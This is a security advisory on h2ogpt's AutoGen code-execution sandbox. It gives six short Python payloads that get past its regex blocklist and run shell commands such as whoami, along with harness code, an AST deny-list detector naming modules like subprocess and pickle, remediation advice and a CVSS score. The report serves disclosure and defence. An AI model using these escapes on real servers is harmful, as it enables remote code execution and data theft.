[Security] Multiple bypass techniques exist in h2ogpt's code execution sandbox

## Summary
Multiple bypass techniques exist in h2ogpt's code execution sandbox (openai_server/autogen_utils.py) that allow arbitrary code execution despite blocklist protections.

## Affected Component
- File: `openai_server/autogen_utils.py`
- Method: `H2OLocalCommandLineCodeExecutor.sanitize_command()`
- Lines: 156-200 (`python_patterns` blocklist)

## Steps To Reproduce

### Bypass 1: importlib.import_module()
The blocklist blocks `__import__()` but not `importlib.import_module()`:
```python
import importlib
subprocess = importlib.import_module('subprocess')
subprocess.run(['whoami'])
```

### Bypass 2: builtins module access
The blocklist does not prevent reaching blocked functions through the `builtins` module:
```python
import builtins
getattr(builtins, '__import__')('os').system('id')
```

### Bypass 3: compile() function
The `compile()` function can create code objects that bypass static analysis:
```python
code = compile('__import__("os").system("id")', '<string>', 'exec')
exec(code)
```

### Bypass 4: marshal.loads() typo
The blocklist contains a typo: it blocks `marshall.loads()` (double L) instead of `marshal.loads()`, so the real function is never matched:
```python
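import marshal
# Stand-in for attacker-controlled bytes: a serialized code object
data = marshal.dumps(compile('print("executed")', '<string>', 'exec'))
marshal.loads(data)  # Not blocked due to typo!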
```
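The effect of the typo can be checked in isolation. The sketch below assumes the blocklist entry is a regular expression of roughly this shape; both patterns are hypothetical and written for illustration, not copied from `autogen_utils.py`.

```python
import re

# Hypothetical patterns illustrating the reported typo; not copied from h2ogpt.
MISSPELLED = re.compile(r"marshall\.loads\s*\(")  # double "l", as reported
CORRECTED = re.compile(r"marshal\.loads\s*\(")    # proposed fix

# The payload is only matched as text here; it is never executed.
payload = "import marshal\nmarshal.loads(data)"

typo_blocks = MISSPELLED.search(payload) is not None
fixed_blocks = CORRECTED.search(payload) is not None
print(f"misspelled pattern blocks payload: {typo_blocks}")
print(f"corrected pattern blocks payload: {fixed_blocks}")
```

Under these assumptions the misspelled pattern never matches the real module name, while the corrected one does.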

### Bypass 5: pickle.load() vs pickle.loads()
Only `pickle.loads()` is blocked, but `pickle.load()` (file-based) is not:
```python
import pickle
with open('malicious.pkl', 'rb') as f:
    pickle.load(f)  # Not blocked!
```

### Bypass 6: getattr for dynamic function access
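`getattr` can resolve any blocked function by name at runtime, so the literal call (for example `os.system(`) never appears in the submitted source: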
```python
import os
getattr(os, 'system')('whoami')
```
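The bypasses above share one cause: a text-matching blocklist only sees the spellings it was written for. The harness below is a minimal sketch of that behaviour. `BLOCKLIST` and `is_blocked` are hypothetical names and patterns modelled on this report's description; the real patterns in `sanitize_command()` may differ.

```python
import re

# Hypothetical blocklist modelled on the behaviour described in this report;
# the real patterns in autogen_utils.py may differ.
BLOCKLIST = [
    re.compile(r"__import__\s*\("),
    re.compile(r"os\.system\s*\("),
    re.compile(r"pickle\.loads\s*\("),
]

def is_blocked(source: str) -> bool:
    """Return True if any blocklist pattern matches the source text."""
    return any(p.search(source) for p in BLOCKLIST)

# Payloads are matched as text only; nothing here is executed.
PAYLOADS = {
    "direct call (control)": "import os\nos.system('whoami')",
    "bypass 1": "import importlib\nimportlib.import_module('subprocess').run(['whoami'])",
    "bypass 2": "import builtins\ngetattr(builtins, '__import__')('os').system('id')",
    "bypass 5": "import pickle\nwith open('malicious.pkl', 'rb') as f:\n    pickle.load(f)",
    "bypass 6": "import os\ngetattr(os, 'system')('whoami')",
}

results = {name: is_blocked(src) for name, src in PAYLOADS.items()}
for name, blocked in results.items():
    print(f"{name}: {'blocked' if blocked else 'NOT blocked'}")
```

With these assumed patterns, only the direct `os.system(...)` call is caught; each indirect form passes the check unchanged.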

## Impact
- Remote Code Execution on the server
- File system access
- Network access
- Potential for lateral movement

## Remediation
1. Add `importlib` to blocked imports
2. Add `builtins` to blocked imports
3. Add `compile()` to blocked functions
4. Fix typo: `marshall` → `marshal`
5. Block `pickle.load()` in addition to `pickle.loads()`
6. Block `getattr` calls on blocked modules
7. Consider using a proper sandboxing solution (seccomp, containers) instead of regex blocklists
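As a rough illustration of items 1 to 6, the checks could be expressed against the parsed syntax tree rather than raw text. This is a sketch only: `BLOCKED_MODULES`, `BLOCKED_CALLS`, and `find_violations` are hypothetical names, the deny-lists are illustrative, and a deny-list of any kind can still be evaded, which is why item 7 (process-level isolation) remains the stronger fix.

```python
import ast

# Illustrative deny-lists chosen for this sketch; not taken from h2ogpt.
BLOCKED_MODULES = {"importlib", "builtins", "marshal", "pickle", "subprocess", "os"}
BLOCKED_CALLS = {"compile", "exec", "eval", "getattr", "__import__"}

def find_violations(source: str) -> list:
    """Return human-readable findings for blocked imports and bare-name calls."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # Collect module names from "import x" and "from x import y".
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            names = []
        for name in names:
            if name.split(".")[0] in BLOCKED_MODULES:
                findings.append(f"import of {name}")
        # Flag calls such as getattr(...) or compile(...) made by bare name.
        if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            if node.func.id in BLOCKED_CALLS:
                findings.append(f"call to {node.func.id}()")
    return findings

# The sample is parsed, never executed.
sample = "import os\ngetattr(os, 'system')('whoami')"
print(find_violations(sample))
```

Blocking `getattr` and `os` outright would also reject a lot of legitimate code, so a real deployment would need to tune these lists or rely on isolation instead.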

## CVSS Score
Estimated CVSS 3.1: 8.8 (High)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low (authenticated user can submit code)
- User Interaction: None
- Scope: Unchanged
- CIA Impact: High/High/High
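The estimate can be reproduced from the CVSS 3.1 base score equations. The sketch below plugs in the standard metric weights for the values listed above (vector `AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H`); the variable names are chosen for this example.

```python
import math

# CVSS 3.1 weights for AV:N, AC:L, PR:L (scope unchanged), UI:N, C:H, I:H, A:H
av, ac, pr, ui = 0.85, 0.77, 0.62, 0.85
conf_w = integ_w = avail_w = 0.56

def roundup(value: float) -> float:
    """CVSS 3.1 Roundup: smallest number with one decimal that is >= value."""
    scaled = round(value * 100000)
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0

iss = 1 - (1 - conf_w) * (1 - integ_w) * (1 - avail_w)
impact = 6.42 * iss                       # formula for Scope: Unchanged
exploitability = 8.22 * av * ac * pr * ui
base_score = roundup(min(impact + exploitability, 10)) if impact > 0 else 0.0
print(base_score)  # 8.8
```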

## Supporting Material/References
- Repository: https://github.com/h2oai/h2ogpt
- File: openai_server/autogen_utils.py lines 156-200

## Impact

An attacker who can submit code to the h2ogpt code execution sandbox can bypass the security controls and achieve arbitrary code execution on the server. This enables:

1. **Remote Code Execution**: Full shell access on the server
2. **Data Exfiltration**: Access to files, environment variables, and secrets
3. **Lateral Movement**: Network access to internal systems
4. **System Compromise**: Installation of backdoors or malware

The sandbox is used by h2ogpt's AutoGen code execution feature, meaning any user with access to code execution can exploit these bypasses. Given h2ogpt is often deployed as an enterprise LLM solution, this could expose sensitive corporate environments.
